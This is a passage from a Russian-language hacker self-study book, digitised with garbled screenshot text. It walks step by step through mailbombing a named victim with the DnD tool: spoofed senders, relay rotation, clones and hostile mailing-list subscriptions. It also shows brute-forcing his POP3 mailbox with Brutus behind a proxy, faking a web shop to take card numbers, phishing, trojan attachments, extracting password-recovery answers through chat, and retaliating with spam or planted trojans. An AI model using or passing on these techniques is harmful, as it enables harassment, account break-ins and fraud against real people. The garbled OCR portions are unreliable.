Другая возможность, которую открывает для хакеров фальсификация Webстраниц — предоставление возможностей для загрузки злонамеренных программ. Например, вместо загрузки нового пакета обновления системы Windows
с Web-сайта Microsoft вы можете загрузить и запустить троянского коня наподобие уже упоминавшейся программы NetBus.
Сейчас мы опишем технику фальсификации Web-сайта, имитирующего виртуальный «Шоп» по продаже «виртуального воздуха» всем богатеньким и тупым «ламерам». Эта техника достаточно проста и заключается в помещении на Webстранице злоумышленника ссылки на сценарий, генерирующий прямо на компьютере пользователя фальсифицированный ресурс. В листинге 8.7 приведен пример кода HTML, реализующего фальсифицированный Интернет-магазин.
Листинг 8.7.
Пример фальсификации документа HTML

Фирма
Bubliki&Baranki
предлагает
своим
посетителям
ВСЕ!!!!!

Если пользователь не обратит внимания на мелкую деталь — строку Адрес
(Address) с несколько странным содержимым, он может и не заметить подмены
реального магазина фальсифицированным «Шопом», в результате которой номер его кредитной карточки перекочует в базу данных злоумышленников со
всеми, как говорится, вытекающими последствиями.
В старых версиях браузера IE можно было без проблем манипулировать строкой Address из сценария Javascript. Хакеры легко
скрывали содержимое этой строки ложным адресом URL Для иллюстрации кода HTML здесь был использован браузер IE 6, который весьма затрудняет подобные действия; более того, IE 6 предупреждает о наличии в коде HTML средств для манипулирования
отображаемыми данными. Так что будьте начеку!
Другой, не менее интересный способ перехвата конфиденциальных данных,
которыми обменивается Web-браузер с сервером — это снифинг сетевых соединений. Перехватывая передаваемые по сети пакеты с номерами кредитных карточек, паролями и прочими интересными сведениями, хакеры могут достичь
очень многого, о чем мы еще расскажем далее в этой книге.

Методы социальной инженерии
Познакомившись с методами хакинга клиентов Интернета, вы, наверное, сами
поняли, что во время путешествий по Web ухо следует держать востро. Недостатки реализации программного обеспечения и некорректная настройка параметров системы защиты браузера позволяют хакеру вытворять прямо чудеса.
Однако наиболее эффективным методом, очевидно, следует считать элементарное мошенничество, основанное на доверчивости и неопытности Webпутешественников.
В предыдущем разделе показано, как легко создать собственный вариант
Web-магазина известной фирмы и начать продавать там виртуальный воздух
в обмен на реальные деньги. Этим возможности хакера отнюдь не ограничиваются. Предложения «бесплатно» загрузить «чудо-программу», согласиться на загрузку странички с аплетом без сертификата от доверенного провайдера, щелкнуть на ссылке и просмотреть «глобальные» возможности различных сайтов все это сразу же окружает пользователя, появившегося на сайте Интернета с

81

Самоучитель хакера
тщательно обезличенным авторством, но очень конкретными целями. Вот что
из этого может получиться.
Загрузив и запустив без всякой проверки распаковку файла программы, вы можете элементарно очистить свой жесткий диск, установить в компьютере
трояна или заразить компьютер вирусом. А поддавшись на уговоры купить
что-либо на Web-сайте, вы можете подвернуться атаке кардера — так называют
хакеров, собирающих номера кредитных карточек у доверчивых простаков.
Основные средства защиты от всех этих напастей таковы:
• Никому не доверять. Все сайты, предлагающие штатные услуги, должны
иметь сертификат от надежного поставщика и обеспечивать защищенные соединения по протоколу SSL.
• Регулярно обновлять Web-браузер и поддерживать настройки его системы
защиты на должном уровне.
• Использовать антивирусы.
Всего этого может оказаться недостаточно, если вы столкнетесь с настоящим хакером, который владеет более серьезными приемами хакинга, чем описанные в
этой главе. Однако для большинства случаев годятся и перечисленные выше меры.
В следующей главе мы углубимся в более изощренные методы хакинга, связанные с электронной почтой. Оказывается, что ныне можно получить такое письмецо, что от вас не потребуется вообще ничего, чтобы стать виртуальным рабом
некоего умельца, специализирующегося на комбинации кодов почтовых посланий. Этими комбинациями мы и займемся.

Заключение
Клиент Web — это весьма притягательный для хакера объект. Ныне виртуальное
киберпространство можно сравнить разве что с территорией, на которой идет
непрерывное сражение за выживание. Чтобы победить в этом сражении, антихакеру следует уметь защищаться, например, настраивать параметры системы защиты браузера и работать с антивирусными пакетами, проверяющими загружаемые из Web сценарии и аплеты. Однако все это вам не поможет, если не
помнить все время одну простую истину — будучи в Web не доверяйте
НИКОМУ, НИЧЕМУ, НИГДЕ и НИКОГДА — и, быть может, обойдется.
Хакеру же следует учесть, что жизнь не стоит на месте и то, что вполне толково
работало в версии 4 браузера IE и Netscape, ныне, в версиях 5 и 6 уже не функционирует. Стало быть следует все время заботиться о совершенствовании
своих умений, помня при этом, что другим людям ваши делишки могут и не
понравиться.
82

Г Л А В А 6.

Деструкция почтового клиента
В этой главе мы опишем крайние разрушительные действия хакеров, направленные на развал всей системы электронной почты любыми методами, включая
взлом паролей доступа к почтовым ящикам, мейлбомбинг, мошеннические приемы раскрытия паролей доступа к почтовым ящикам и запуска троянских коней на
компьютере ламера, попавшегося на крючок толковому «кул хацкеру».
Все описываемые далее методы хакинга требуют от хакера
тщательного скрытия своего местопребывания и вообще любых
сведений, могущих навести на его след разнообразных блюстителей порядка в киберпространстве. Если вы захотите попробовать на практике все описанные далее приемы хакинга, настоятельно рекомендуем ограничиться экспериментальной интрасетью, и никогда никому не рассказывать о своих занятиях. Если же
вы захотите попробовать свои силы в Интернете, то учтите,
что этим самым вы переступаете за некую красную черту, после
чего может наступить все, что угодно, за что автор не несет
никакой ответственности и вообще не советует… Короче, думайте сами — вас предупредили!

Мейлбомберы и мейлбомбинг — это одна из самых излюбленных забав личностей наподобие доктора Добрянского (да, да, того самого, из Главы 1, с лысым
обугленным черепом и хаотической походкой). В самом деле, ну что может быть
забавнее, чем завалить всяким бессмысленным хламом почтовый ящик вашего
недруга или просто первой попавшейся личности, встретившейся на прогулке в
киберпространстве! Пусть потом этот бедолага разгребает полученный мусор, да
еще и объясняется с системным администратором почтового сервера. Хотя зачем заниматься рассылкой писем? Ведь можно сделать еще проще — подписать
свою жертву на рассылку кухонных рецептов или спортивных новостей — и пусть
всю работу возьмут на себя владельцы сайтов — распространителей подписки.
Все такие послания называются флудом (от английского слова Flood — заливка,
затопление) или спамом (от английского слова Spam — колбасный фарш, консервы. Причина применения слова Spam в компьютерной технологии остается загадкой). Чтобы «зафлудить» чужое «мыло» (т.е. забить мусором электронный
почтовый ящик своего недруга), существует множество программ, причем весьма высокоразвитых, позволяющих без всяких проблем переслать кучу случайно
сгенерированных сообщений по указанному адресу. Флудеры к тому же умеют
скрывать реальный почтовый адрес отправителя, используя для этого прокси-

Самоучитель хакера
серверы и анонимные SMTP-ретрансляторы. Мы опишем работу такого мейлбомбера на примере программы со страшным названием Death & Destruction
Email Bomber (Смертельный & Всесокрушающий мейлбомбер) версии 4.0,
сокращенно называемой DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
Читатели могут без труда найти в Интернете множество других мейлбомберов, выполнив поиск по строке запроса «мейлбомбер». Функциональные возможности мейлбомберов могут разниться по числу предоставляемых инструментов, и мы выбрали
DnD, посчитав его наиболее высокоразвитым программным средством. В дополнение к нему особенно рекомендуем познакомиться с
мейлбомбером Avalanche — по возможностям Avalanche не уступает
мейлбомберу DnD, а кое в чем и превосходит его.
На Рис. 6.1 представлено рабочее окно мейлбомбера DnD 4.O.

м-ш

Death and Desliuclion 4.0
File

Clones

Header»

Session

Random Lists

Mailing Lilts

Window

Extras

ттт
Send bomb to:
Say bomb is from: I
Message Subject: I

_pj

CC:

|7| 0 Randomly Change | EdilL
] 0 Randomly Change | Edit List

Message Body:
| SMTP Spy

jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy

Help

Email Bombing is rarely damaging
to the target but is always
damaging to smtp hosts. I do NOT
condone mailbombing as it
causes problems for SysAdmins of
servers. I did not make this
program for people to blast away
at each other. PLEASE use it
responsibly, and if you HAVE to
email bomb, then please use the
option to randomly switch servers
in between messages; as it
lightens the loads on the server.
Have fun and don’t ruin a good
sysadmins time by flooding his
server!

i-Size of BombIB И Randomly Change [ — ,Usages to send:
-m— I
Edit Server list
JI
1 I O Never ending bomb

20.01.2003».

use the Edit He»

Puc. 6.1. Набор инструментов DnD весьма обширен
Чтобы разобраться в возможностях программы DnD, давайте для пробы «зафлудим мыло» нашего ламера Коли, работающего на компьютере А1ех-1. Для этого
мы вначале перешлем Коле десяток посланий со случайно сгенерированным содержимым, постаравшись сохранить свою анонимность (на всякий случай).
Выполнение такой атаки требует специальной настройки параметров мейлбомбера и подготовки почтовой бомбы.
Рассмотрим эти задачи по порядку.
84

Деструкция почтового клиента

Снаряжение
Для настройки DnD используется группа элементов управления Settings
(Настройка), расположенная внизу рабочего окна программы DnD (см. Рис. 6.1).
Для настройки DnD в группе элементов управления Settings (Настройка) следует
установить следующие параметры:
> В поле с открывающимся списком SMTP Host (Хост SMTP) выберите из списка, либо введите сами адрес ретранслирующего SMTP-сервера, который будет использоваться для рассылки спама. Мы будем использовать свой SMTPсервер Sword-2000.sword.net.
> В открывающемся списке Spoof Host (Поддельный хост) укажите название
несуществующего хоста, которое будет отсылаться на атакуемый компьютер.
Это название должно состоять из одного слова, которое также можно выбрать из открывающегося списка.
Флажок Randomly Change (Случайная замена) позволяет задать режим,
при котором каждое письмо будет
пересылаться через случайно выбранный SMTP-сервер.
> Если необходимо отредактировать
список SMTP-серверов, щелкните
на кнопке Edit Server List (Редактировать список серверов). На экране появится диалог Random
Server List (Список случайных серверов), представленный на Рис. 6.2.

•^ Random Servei List
orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net
stjohns.edu

] Imalasada.lava. | lpressentef.com | |cyberhighway.n|

mail.sisna.com| | why.net

|widQwmaker.co| Iclubmet.mettob |

wwa.com J |nyx1G.cs.du.ed| | clinet.fi
soi.hypeichalcl rdagobert.rz.uni-jl lspace.net
tka.com
ihZOOO.nel

| Iplix.conr

j jcabletegina.co |
J |maple.nis.net

|

Idubmet.metrob | ltMvl.net
| vitro, com

Puc. 6.2. Диалог для правки списка
ретранслирующих SMTP-серверов

Для коррекции списка SMTP-серверов щелкните на нужном поле в диалоге
Random Server List (Список случайных серверов) и

отредактируйте его.
Для сохранения изменений щелкните на кнопке Submit (Утвердить).
В группе переключателей Size of Bomb (Размер бомбы) (Рис. 6.1) установите
один из переключателей для выбора числа передаваемых писем:
• Выбор # of messages to send (Число сообщений для отправки) позволяет
в соседнем справа поле задать число передаваемых сообщений. В нашем
случае задайте 10.
• Выбор Never ending bomb (Бесконечное число бомб) приводит к нескончаемой передаче сообщений.

85

Самоучитель хакера
Check the box and then fill in the information that will appear in the
headers under that category; or uncheck the box to remove it from
the headers.
П X-Mailer:

|

П X-URL:

|

П X-Sender:

|

П X-Date:

|

Q Return Path: [
Q References: |
П Priority:

I

Q X-Authenlication Warning
| Generate IP |

|124.49.153.SO

Ok

|

[TedGilsdorf
Clear

Cancel

Puc. 6.5. Ввод заголовков MIME также поможет замести следы

АН13ка клонов
Кроме описанных возможностей, в программе DnD имеется несколько дополнительных средств, помогающих в рассылке спама своим жертвам. Среди важнейших средств досадить своему недругу упомянем возможность рассылки клонов почтовых бомб, посылаемых одновременно по одному или нескольким адресам,
с использованием одинаковых настроек мейлбомбера.
Чтобы запустить клона, можно щелкнуть на кнопке Clone (Клон) в диалоге
E-Mail bomb (Почтовая бомба) и отобразить диалог Bomber Spawn 1 (Генератор
бомб), представленный на Рис. 6.6.
-a Bomber Spawn 1

ЯШЁГ

1

Sendbombto:

Г-1

Say bomb is from:

ГЛ ЕЭ Randomly Change

Message Subject:

| |

l

Random

|

Message Body:

1
SMTP Server:

ГП gl Randomly Change

ya

ll§nll°ml| I Edit Headers | | Abort || Clear

£j?

[Status

I

{Messages Sent! |0

|

Puc. 6.6. Диалог создания клонов
88

Деструкция почтового клиента
Как видим, диалог Bomber Spawn 1 (Генератор бомб) создания и рассылки клона практически совпадает с диалогом E-Mail bomb (Почтовая бомба) и служит
для той же цели — создания почтовой бомбы и рассылки ее по указанному адресу
через ретранслирующие SMTP-серверы. Преимущество рассылки клонов состоит в возможности параллельной отправки множества писем, идущих к адресату
через множество SMTP-серверов. Теперь-то этому ламеру Коле не устоять — получив сотни писем со всех сторон света, он не захочет и близко подходить к забитому епамом почтовому ящику! Ведь от такой атаки не спасут даже средства
фильтрации электронной почты — множество использованных адресов источников весьма затруднит решение такой задачи.
Если же вы хотите совсем уж добить Колю, можно создать множество клонов столько, сколько потянет обработать ваш компьютер и линия связи (не увлекайтесь — их ресурсы вовсе не беспредельны).
>• Чтобы создать множество клонов, в главном окне мейлбомбера DnD выберите команду меню Clones » Load Multi Clones (Клоны * Загрузить множество клонов). На экране появится диалог Number of clones (Количество
клонов), представленный на Рис. 6.7
Number of clones
How many clones do you want to load?

L

J

Puc. 6.7. При задании числа клонов
будьте благоразумны — компьютер не резиновый!
> В диалоге Number of clones (Количество клонов) укажите число клонов (оптимально 5-6) и щелкните на кнопке ОК.
В главном окне отобразится указанное число диалогов Bomber Spawn №
(Генератор бомб), пронумерованных от 1 до № — в зависимости от указанного
количества клонов. Настройте параметры клонов аналогично настройке почтовой бомбы и щелчками на кнопке Send Bomb (Послать бомбу) направьте эту
армаду клонов по адресу ламера Коли. Можно с уверенностью сказать — такая
атака клонов ему будет не по вкусу!

Ко&ро&ое бомбометание списками рассылки
Но и это еще не все! Ведь существует такая прекрасная вещь, как списки рассылки — включив в них свою жертву, можно с уверенностью предречь целую
89

Самоучитель хакера
кучу неприятностей владельцу почтового ящика! И программа DnD предлагает
для этого целый набор списков рассылки, который можно открыть, выбрав команду меню Mailing lists (Списки рассылки). Отобразившийся диалог Subscribe
joe lamer to mailing list (Подписка ламера на список рассылки), представленный
на Рис. 6.8, предложит вам подписать своего врага на такие интересные вещи,
как Euro Queer (Европейское чудо), Mormons (Мормоны), Family Medicine
(Семейная медицина) и так далее и тому подобное — в списке найдется подписка
на любые вкусы!
Я1=Ш1

*i Subscribe joe lamei to a mailing list!

Subscribe your enemy to a mailing list • even worse then a mailbomb!
More lists coming next version..sorry lor the small quantity (his lime.
My apologies for the bad usability but I will use checkboxes instead of option boxes
next version..
©Jewish List

О CMd Parenting

Targets email address:

[

О Digital Queers О Gay Quakers

Targets fits! name:

|j0hn

О Mormons

О Christianity

Targets last name:

|роп

О Gay/Lesbian

О womanism

О Euro Queer

О ВЫ people

О Lesbians over 40

О Bi Australians

О Family Medecine

О Allergies

Puc. 6.8. Списки рассылки программы DnD могут удовлетворить любые вкусы
Недаром разработчик программы DnD считает подписку на список рассылки
оружием пострашнее мейлбомбинга. Введите адрес своего врага в поле Target
Email Address (Адрес назначения), и щелкните на кнопке Subscribe em
(Подписать) — все остальное программа сделает сама. И ваш недруг очень удивится, когда к нему будут поступать назойливые сообщения со всякими сомнительными советами и предложениями.

Дополнительные вооружения
Кроме рассылки почтовых бомб и клонов, а также подписки жертв на списки
рассылки, мейлбомбер DnD оснащен дополнительными вооружениями, однако,
как признается автор программы, их работа плохо тестирована. Среди этих инструментов выделим утилиту генерирования паролей, запускаемую командой
меню Extras » Pword generator (Дополнение * Генератор паролей). При этом
открывается диалог Randomic Password Generator (Генератор случайных паролей), представленный на Рис. 6.9.
Чтобы сгенерировать пароль, следует в поле How many characters? (Сколько
символов?) указать его длину (стандартные требования — не менее 8 символов) и
с помощью переключателей выбрать: Use Both (Использовать оба) — использование в пароле и буквы и цифры, Use numbers (Использовать цифры) — исполь90

Деструкция почтового клиента
зование в пароле только цифры или Use
letters (Использовать буквы) — использование в пароле только буквы. Программа-генератор на первый взгляд работает неплохо, однако буквы генерируются только в нижнем регистре, что
ослабляет криптостойкость созданных
паролей.

•*В Randomic Passwoid Geneialor

ттт

Jusl click to generate a random password. Choose how long
you want it to be by the number ol characters.
How many characters? [12 |
© Use Both

О Use numbers О Use letters

6i2i9e1m5p8i

Close

Clear box

В меню Extras (Дополнение) имеются и
другие инструменты — удаленного Рис. 6.9. Генерация случайных паролей
управления SMTP-хостом (пункт меню
SMTP Remote (Удаленное управление SMTP)), подключения к портам сетевых
компьютеров (пункт меню Raw Port (Вскрытый порт)). Все эти средства очень
полезны для взлома почтовых серверов, но требуют знания почтовых протоколов (в частности, команд SMTP). А щелчок на пункте меню Other Tools
(Другие инструменты) открывает диалог с целым набором инструментов сетевого хакинга. Однако мы не будем здесь рассматривать эти инструменты — это вопрос, обсуждаемый в следующих главах, где будут описаны более совершенные
инструменты сетевого хакинга.
Итак, мы решили первую задачу — «зафлудили мыло» своего недруга; теперь
самое время подумать о более рациональной трате своих сил. В самом деле, ну
погорюет ламер Коля о потере своего почтового ящика, так ведь и новый открыть недолго. Более содержательная атака состоит во взломе доступа к почтовому ящику своего недруга, что даст хакеру воистину безграничные возможности по доведению ламера до кондиции (зависящей от криминальных наклонностей хакера). Итак, рассмотрим хакерские технологии взлома почтовых ящиков.

паролей к почтовому яшику
Самая простая технология состоит в подборе паролей к почтовому ящику своего
недруга путем простого перебора всех вариантов логинов и паролей для входной
регистрации. Программы, реализующие такую технологию, действуют очень
просто — они подсоединяются к почтовому серверу по протоколу РОРЗ (или
IMAP) и посылают ему запросы на авторизацию, изменяя логины и пароли. Если
попытка регистрации удалась — почтовый ящик взломан.
Примером программы такого рода является Brutus Authentication Engine Test 2
(Машина Brutas для аутентификационного тестирования, версия 2), сокращенно
Brutus AET2 (http://www.hobie.net/brutus). На Рис. 6.10 представлен главный
диалог программы Brutus, содержащий все необходимые инструменты взлома
паролей доступа к почтовому серверу РОРЗ, серверу FTP, HTTP, Telnet и даже
троянскому коню NetBus.
91

Самоучитель хакера

»1

I Biulus • AET2 — www.hoobie.net/biutu: — (January 2000)
lie

1

Tools

Target

(SisJEI

Help

|127.0.0.1

|

Ti»pe|POP3

|~| | Start

| Stop [Clear


Port (110

Connections ИЩШИИИНМ 10 Timeout ФЩ^Щ} 10

|

П Use Proxy | Drf»» |

|B’?S..?®.^.P.9.?.l| D Try to stay connected for [Unlimite |
^
| attempts

.

.

.

0 Use Username

П Single Usef

User File | users.txt

Pass Mode [Word List «p|
| | Browse |

pass pje jwords.txt

| | Browse |

Positive Authentication Results
Target

I Type

5J
II

I Username

|
II

ТЫюи)

I Password

R«*cl

AuthSeq

I

Throttle Quick Ki

ll>dle

*

Puc. 6.10. Главный диалог программы Brutus весьма содержателен

В этой главе мы рассмотрим средства взлома почтового сервера РОРЗ, оставив в
стороне другие средства программы Brutus (в главе 8 мы опишем применение
Brutus для взлома доступа к серверу IIS). В качестве жертвы мы изберем опятьтаки ламера Колю, хранящего свою почту по адресу alex-1 .sword.net, с учетной
записью kolia. На первый раз ограничимся взломом только пароля, считая, что
логин нам известен — его можно добыть многими другими способами, о которых
мы поговорим чуть позже.
Для взлома почтового ящика ламера Коли выполним такие шаги.
>• В диалоге Brutus — АЕ2 (Рис. 6.10) в поле Target (Цель) укажите адрес почтового сервера РОРЗ, в данном случае alex-1.sword.net.
>• В открывающемся списке Туре (Тип) выберите тип взламываемого сервера,
в данном случае РОРЗ.
>• В группе элементов управления Connection Options (Параметры подключения) не забудьте установить флажок Use Proxy (Использовать прокси), если
вы работаете с реальным почтовым ящиком — это позволит вам сохранить
анонимность.
>• В группе элементов управления Authentication Options (Параметры авторизации) установите флажок Single User (Единственный пользователь) — теперь
программа будет искать пароль для одного пользователя.

92

Деструкция почтового клиента
х В поле User file (Файл пользователя) ведите логин для взламываемого почтового ящика, т.е. имя учетной записи Коли — kolia.
>• В открывающемся списке Pass Mode (Способ взлома) выберите Brute Force
(Прямой перебор). Диалог программы Brutus примет вид, представленный на
Рис. 6.11.

тшт

X Biutus — АЕТ2 — www.hoobie.net/biuluit — (January 2000J
File

Tool.

Target

Help

|alex-1.sword.net

[T| | Start | Slop | Clear |

Type|POP3

nnection Optioru

P

>orl [110

|

I 10

I 10 Timeout

Connections

П Use Proxy I Define!

IPS Options-

| Modify sequence |

П Try to slay connected for |Untmil8 |-r | attempts

-Authentication Options
0 UseUsemame
UserlD

Pass Mode [Brute Force|—1 |[Kange|| | Dfellfcuted |

0 Single User

| kolia

Positive Authentication Results
I Type

Target

I Username

| Password

R«t»et

AuthStq

|

Throttle Quick Kil

Puc. 6.11. Настройка программы Brutus для взлома сервера POPS
Обратите внимание на появившуюся после выбора способа взлома кнопку Range
(Диапазон). Щелчок на копке Range (Диапазон) открывает диалог Brutus — Brute
Force Generation (Brutus — Генерирование паролей прямым перебором), представленный на Рис. 6.12.
Biutus — Biule Foice Generation
© Digits only

Min Length [

О Lowercase Alpha

Max Length [4 [T

О Uppercase Alpha
О Mixed Alpha

Cancel

О Alphanumeric
О Full Keyspace
О Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! |

Puc. 6.12. Диалог выбора символов и длины взламываемого пароля

93

Самоучитель хакера
В диалоге Brutus — Brute Force Generation (Brutus — Генерирование паролей
прямым перебором) делается основной выбор — следует оценить, какой длины
может быть пароль у Коли, и какие символы он может применить. Учитывая,
что Коля — неопытный пользователь, мы выберем в поле Min Length (Минимальная длина) число 3, а в поле Max Length (Максимальная длина) — число 4. Применяемые символы мы ограничим цифрами, установив переключатель Digits only
(Только цифры).
Теперь все готово для атаки.
> Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 и наблюдайте за
сообщениями и линейным индикатором внизу диалога Brutus — АЕ2. Результат представлен на Рис. 6.13.
В 1=1 ЕЭ

X Uiutus — АЕТ2 — www.hoobie.net/biutus — [Januaiy 2000J
File

Took

Help

Target | alex-1.sword.net

EJ | Start | Stop | Clear |

Type|POP3

i-Connection Option*
I

Port [110

|

Connections

10

10 Timeout

rPOlP3 Options| Modify sequence |

I?

D Try to stay connected for |Unlimite | •> | attempts

-Authentication Options
El Use Username
UserlD

Pass Mode [Brute Force [

0 Single User

I Range

DisllbAed

[kolia

Positive Authentication Results
Target
alex-1.sword.net

I Type
POP3

| Username
kolia

I Password
0007

I

Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts

Timeout
10997

Uikolia P:0000

~]|37 Attempts per second

Reject

Throttle

Quick И

|Idle

Puc. 6.13. Пароль почтового ящика номера Копи взломан1.
Из записи в поле Positive Authentication Results (Положительные результаты
аутентификации) видно, что пароль учетной записи kolia найден — 0007. Там же
можно увидеть, что в процессе взлома программа Brutus выполнила 10997 попыток регистрации на почтовом сервере alex-1.sword.net (всего их число равно
11000). На это было потрачено почти 5 минут работы компьютера Pentium 3 с
частотой процессора 1000 МГц, связанного с почтовым сервером через сеть
Ethernet с пропускной способностью 10 Мбит/сек.
Теперь можно трезво оценить, чего стоят средства взлома паролей почтовых
ящиков методом подбора паролей, подобные программе Brutus (а их достаточно

94

Деструкция почтового клиента
много). Во-первых, не все пользователи такие ламеры, как Коля, и поэтому выбирают пароли достаточной длины (минимум 8 символов!), используя при этом
буквы, цифры и спецсимволы клавиатуры (например, л&$ и т.д.). Взлом таких
паролей потребует неимоверных ресурсов! Для практики попробуйте в диалоге
Brutus — Brute Force Generation (Brutus — Генерирование паролей прямым перебором) выбрать длину пароля 8 символов, а переключатель выбора символов
установите в позицию Full Keyspace (Вся клавиатура). Щелчок на кнопке Start
(Старт) отобразит в диалоге Brutus — АЕ2 фантастическое число всех вариантов
поиска — 6 095 689 385 410 816 — непонятно даже, как его написать словами!
А если выбрать 12 символов?
Несколько лучше выглядит перспектива словарной атаки, когда при поиске паролей используется словарь, в частности, наиболее часто употребляемых слов
(см., например, перечень в [10]). Эти средства также представлены в Brutus, и
для их использования следует выбрать режим атаки со словарем в поле Pass
Mode (Способ взлома). Однако учитывая количество слов в английском языке
(около 100 000), да еще и наличие в нем склонений и спряжений, такие атаки
также не вызывают энтузиазма. Ну разве что можно попробовать сотнюдругую излюбленных ламерами паролей, типа password, parol, MyPassword
и так далее — на хакерских Web-сайтах и компакт-дисках часто можно найти
словари подобного рода.
Во-вторых, все такие попытки аутентификации чаще всего выполняются через
удаленное соединение, пропускная способность которого на несколько порядков
ниже, чем у соединения через Ethernet, и не превышает 30-50 Кбит/сек (и это
еще хорошо). Есть и третье соображение — следует учесть возможности системы
защиты почтового сервера. Вряд ли нынче существует хоть где-либо почтовый
сервер, не ограничивающий число попыток входной регистрации — такие серверы нынче просто не выжили бы, как динозавры или мамонты, под напором
«кул хацкеров», преисполненных желания вломиться на чужую территорию и
все там сокрушить.
Все это заставляет задуматься о практической применимости средств для взлома
почтовых ящиков путем простого перебора логинов и паролей входной аутентификации. Учитывая наш эксперимент, можно заключить, что хакерам не остается ничего другого, как искать дыры в системе защиты почтовых серверов,
прибегать к мошенническим уловкам и уповать на глупых системных администраторов, не поддерживающих железный порядок в проведении политики безопасности для компьютерной системы организации. Первым пунктом этой политики должно быть правило использования сложных паролей достаточной длины.
Второе правило должно требовать неукоснительной замены паролей не реже
раза в месяц — иначе и в самом деле возникает риск взлома, хотя бы через локальную сеть организации.

95

Самоучитель хакера
Насчет дыр в системе защиты серверов IIS и использовании для их взлома программы Brutus мы еще поговорим в Главе 8 этой книги, а здесь нам осталось обсудить одну интересную тему — методы социальной инженерии. Проще говоря,
это мошенничество и прочие уловки, к которым прибегают наиболее изобретательные хакеры для взлома почтовых серверов. Эти методы для практиков представляют наибольший интерес, поскольку, как мы убедились, прямой взлом
почтового сервера — дело почти безнадежное, а вот обходные пути — это еще как
сказать! Ведь недаром поется в одной песенке: «Нормальные герои всегда идут в
обход!». Так что приступим к обходным маневрам.

Методы социальной инженерии
Самый простой и надежный метод получения пароля доступа к почтовому серверу, а также и вообще к любому сервису Интернета, состоит в рассылке мошеннических писем, имеющих целью вынудить ламера самому сообщить свой
пароль. В Главе 1, в самом начале, приведено одно такое письмо, якобы от провайдера Интернета, приглашающее получателя указать «новый» пароль для защиты своего доступа к серверу Интернета. Это — неприкрытое мошенничество,
поскольку системные администраторы, что бы там о них не писалось в различных хакерских изданиях, никогда не опускаются до такой глупости, как запрос у
пользователей их паролей по электронной почте. Тем не менее, такой прием
срабатывает — ведь нынче к освоению Интернета ежедневно приступает множество доверчивых новичков (все мы когда-то были новичками), так что шансы на
успех неплохие.
Другой, более технически продвинутый метод — рассылка писем с вложениями,
содержащими злонамеренный программный код. В предыдущей главе мы рассмотрели несколько таких атак на компьютер ламера Коли. Как вы помните, в
результате атаки TFTP на компьютер А1ех-1 было записан и запущен код в активном вложении электронного письма, после чего компьютер А1ех-1 превратился в сетевого раба хакера Пети. Надо сказать, что хотя описанная атака TFTP
весьма эффектна, ее вряд ли можно назвать эффективной. Ведь если компьютер
позволил открыть неаутентифицированный сеанс связи по протоколу TFTP для
записи файлов на диск компьютера, то его система защиты настолько слаба, что
для взлома можно попробовать другой метод, попроще и понадежнее. Количество компьютеров, подсоединенных к Интернету вообще без всякой защиты, воистину безмерно, и с точки зрения хакера, бродящего по киберпространству в
поисках поживы, такой компьютер напоминает виртуальный дом с открытыми
настежь дверями и окнами.
Рассылка писем с вложениями представляет собой наилучший способ внедрения
троянов. Применяемая при этом техника обмана пользователей весьма проста разослав кучу писем с вложенной программой инсталляции трояна, хакер ждет,
96

Деструкция почтового клиента
когда доверчивый получатель письма щелкнет на кнопке (или ссылке) для открытия вложения. Чтобы привлечь внимание, это вложение рекламируется в
письме как, допустим, «бесплатное» обновление Web-браузера или «пакет бизнес-программ» и т.п. (и это только часть того, что доводилось находить в своем
почтовом ящике). Щелчок для открытия вложения запускает программу инсталляции. На компьютере-жертве устанавливается, например, троян, который сообщает хозяину о своем успешном внедрении по конкретному ГР-адресу.
Все остальное очень просто. Если внедренный троян — «ленивый», т.е. работает
как обычный кейлоггер, он будет постепенно передавать всю информацию о
ваших действиях своему хозяину — и, в числе прочего, передаст все введенные
вами пароли. Если же троян «активный», т.е. поддерживает средства удаленного
управления, он позволит своему хакеру подключаться к компьютеру-жертве и
делать на нем что угодно — фактически стать владельцем всех информационных
ресурсов компьютера. Вот недавно, в конце 2002 г., в Москве накрыли одну такую компанию «кул хацкеров», занятых рассылкой троянов, которые выведывали
пароли доступа к провайдерам Интернета у незадачливых получателей писем.
Потом эти пароли продавались прямо с Web-странички. Потом за этими «хацкерами» пришли. Потом их посадили. Так что думайте…
Вот еще один эффективный метод обхода защиты почтовых сервисов (и не
только их). На Web-страничках, предоставляющих сервис электронной почты,
очень часто можно встретить строку типа Забыли пароль?, позволяющую восстановить забытый пароль доступа. Щелчок на этой строке предлагает ввести
ответ на вопрос, который вы выбрали при регистрации на почтовом сервере например, Ваше любимое блюдо?, Девичья фамилия матери?, Как зовут
Вашу собачку? и так далее. Такой способ восстановления доступа к почте — это
настоящий Клондайк для понимающего человека, поскольку число блюд, имен и
фамилий не так уж и велико и, к тому же, их можно выведать у самого хозяина
почтового ящика. Для этого можно, скажем, написать ламеру письмо и пригласить его на свой любимый чат, а там, завоевав доверие, выведать у него все эти
сведения. Скажем, если в непринужденной виртуальной беседе узнать у ламера
Коли, что его любимое блюдо — пареная репа, то можно попытаться проникнуть
в его почтовый ящик, указав в ответ на запрос о любимом блюде строку типа
гера или repa_parenaia, ну и так далее — побольше фантазии!

Заключение
Описываемые в главе методы не без основания кое-где называются террористическими. Поэтому хакер, прежде чем приступить к их использованию, должен отчетливо понимать свои перспективы, могущие появится на горизонте
при неосторожном обращении с такими разрушительными орудиями, как
мейлбомберы и взломщики паролей почтовых серверов. Основное предна97
4 — 5830

Самоучитель хакера
значение таких приспособлений — хулиганство, шантаж, вандализм, дискредитация своей жертвы путем опубликования личной переписки и так далее и тому
подобное — что ни деяние, то статья уголовного кодекса. Так что всем желающим испытать эти инструменты на практике автор настоятельно советует ограничиться экспериментальной интрасетью.
Антихакер должен знать эти инструменты не хуже хакера, поскольку с их помощью можно решить кое-какие задачи активной обороны. Став объектом
спэмминга или подвергнувшись атаке взлома пароля почтового ящика, можно
попробовать вычислить почтовый адрес своего обидчика и ответить ему той же
монетой. К примеру, можно забросать его спамом (вернуть обратно полученное
письмо десять раз) или поместить в свой почтовый ящик письмецо с трояном глядишь, и подловишь зазевавшегося «кул хацкера» на горячем — нечего лазить
по чужим ящикам!
К мерам пассивной обороны следует отнести такие меры.
• Используйте сложные пароли доступа к почтовому серверу, длиной не менее
8 (лучше 12) символов, включающих буквы, цифры и спецсимволы. Лучше
